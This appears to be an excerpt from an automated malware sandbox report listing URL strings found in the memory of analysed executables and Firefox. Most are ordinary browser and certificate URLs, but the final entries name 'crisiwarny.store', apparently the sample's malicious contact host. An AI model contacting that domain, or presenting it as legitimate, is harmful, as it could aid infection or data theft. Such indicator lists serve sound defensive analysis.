Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-timesp
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsXq
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 0000001D.00000002.2986603833.000001E762BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2881911418.000001E762CF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2884209139.000001E762CF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2981878374.000001E76137E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76382C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762905000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762908000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763840000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983794051.000001E762703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2982682375.000001E7624C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76380F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shandlerSvc
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modu
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: e192e43b61.exe, 0000000A.00000003.2899300146.0000000001171000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764E43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76374D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764E96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:scope
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulApplication
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/locale/safebrowsing/sa
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/printPreviewPag
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616773453.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180use
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.s
Source: e192e43b61.exe, 0000000D.00000003.2806047135.000000000111B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
